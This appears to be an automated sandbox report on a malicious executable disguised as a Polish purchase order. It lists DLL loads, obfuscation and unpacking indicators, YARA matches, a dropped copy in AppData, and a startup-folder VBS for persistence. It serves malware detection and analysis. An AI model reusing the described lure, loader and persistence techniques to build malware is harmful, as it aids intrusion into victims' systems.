Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.000000000342B000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004068000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2124472344.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.000000000321E000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: W.pdb4 source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.0000000003539000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000003317000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3304177579.000000000045B000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.000000000342B000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004068000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2124472344.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.000000000321E000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs

.Net Code: Type.GetTypeFromHandle(sEKTJnFmS9iKlkBOqrf.JSdpYPRbLW(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(sEKTJnFmS9iKlkBOqrf.JSdpYPRbLW(16777252)),Type.GetTypeFromHandle(sEKTJnFmS9iKlkBOqrf.JSdpYPRbLW(16777284))})

.NET source code contains potential unpacker

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: FieldNames.exe.0.dr, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.3488fa4.1.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.4799d38.9.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.4799d38.9.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.4799d38.9.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.4799d38.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.4799d38.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 6.2.FieldNames.exe.44d74f8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.46e74f8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6d80000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2306805654.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2112093538.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123637208.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2288985162.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FieldNames.exe PID: 1272, type: MEMORYSTR

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E05F8 push eax; ret	0_2_015E0602
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E0588 push eax; ret	0_2_015E0602
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E0588 push eax; ret	0_2_015E0612
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E05B8 push eax; ret	0_2_015E05F2
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E0618 push eax; ret	0_2_015E0622
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E0608 push eax; ret	0_2_015E0612
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C05B8 push eax; ret	6_2_013C05F2
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C0588 push eax; ret	6_2_013C0602
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C0588 push eax; ret	6_2_013C0612
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C05F8 push eax; ret	6_2_013C0602
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C0618 push eax; ret	6_2_013C0622
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C0608 push eax; ret	6_2_013C0612
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB55C3 push edx; retf	6_2_05CB55CA
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB55D3 push ebx; retf	6_2_05CB55DA
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB558C push edx; retf	6_2_05CB55A2
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB55AB push eax; retf	6_2_05CB55B6
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB55A3 push ecx; retf	6_2_05CB55AA
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB55B7 push ecx; retf	6_2_05CB55C2
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB4C1B push 00000048h; retf	6_2_05CB4C22
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB3FDB push ds; retf	6_2_05CB3FE1
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB11CB push cs; retf	6_2_05CB11D2
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB406C pushad ; retf	6_2_05CB406D
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB1ACD push ss; retf	6_2_05CB1ACE
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB1AC3 push ss; retf	6_2_05CB1ACA
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB6A2F push esp; retf	6_2_05CB6A35
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB6A38 push 699605CBh; retf	6_2_05CB6A3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_004024F2 push ds; retf	7_2_0040250D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_004011C5 push 25BF6CCCh; retf	7_2_004011CA

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, AssemblyLoader.cs	High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'mImcw49DFTBR2Kc4glt'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, OK20t2DmSFhZLKxJ1Za.cs	High entropy of concatenated method names: 'vqkDwJJFoy', 'wdiDfG456s', 'dlCDRgE2bA', 'YWEDom5NSQ', 'lUuDa6iXa8', 'zm311aolGinfrvCjIOu', 'UWwKxqoAcZQGCAw4v7t', 'tV9GoioIABuhWMxSqth', 'G3xHp4obNpoXAlnrXg3', 'B4n61toH1VV5suyhdsF'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, MWjo8yZPThnGCd2dRnI.cs	High entropy of concatenated method names: 'MPuZSkrj56', 'p0YZ7Y8PQI', 'TyvZNNbyoo', 'AuLZAbOt5M', 'kQcZILSfsu', 'TnTZb7gm5T', 'RlUZHuu0sf', 'WExZcU4sBs', 'NNlZ2eQj74', 'DKgZ4ml6yY'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, qg3O71FzVYe2k3vnArU.cs	High entropy of concatenated method names: 'TxBb3JdYSH', 'sJqbvteI3w', 'BiYbEIKfkn', 'OIFb6HtJo5', 'CHRbiFE01x', 'EyQbUIf0ux', 'C6HbxBSxcs', 'bpv7Jg0Shh', 'MgObXHYWLb', 'GG6bmaR8KN'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, sI2PgIFoi615B5KFe1M.cs	High entropy of concatenated method names: 'yIYFq3PUUE', 'mtLFV546g8', 'tZMFMnkwcm', 'rfdFWDT5V8', 'iqFFG5DkqS', 'MebFnLkBya', 'oaTFO8iwSj', 'RHsFjU9SFY', 'SbKF895fQ0', 'PFXFLFUrZ1'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs	High entropy of concatenated method names: 'yDIx0B9KxRLPlWDAa9H', 'sRNQqK99VsPxOTvJQLY', 'MA8FFs65OY', 'aK0nDa9sKbZkFDdRABx', 'uapS7a95TTeO3EHF4ui', 'qfXcWp9pPB2bFtNTbBw', 'sPkJIK9TBdJKUrGmidE', 'mDNUjH9uZNfDLRCKLTw', 'ytDeOL9qFoo1owG0jR3', 'APj8aC9Vvsf7TDvNNne'

Drops PE files

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File created: C:\Users\user\AppData\Roaming\FieldNames.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs

Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs

Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
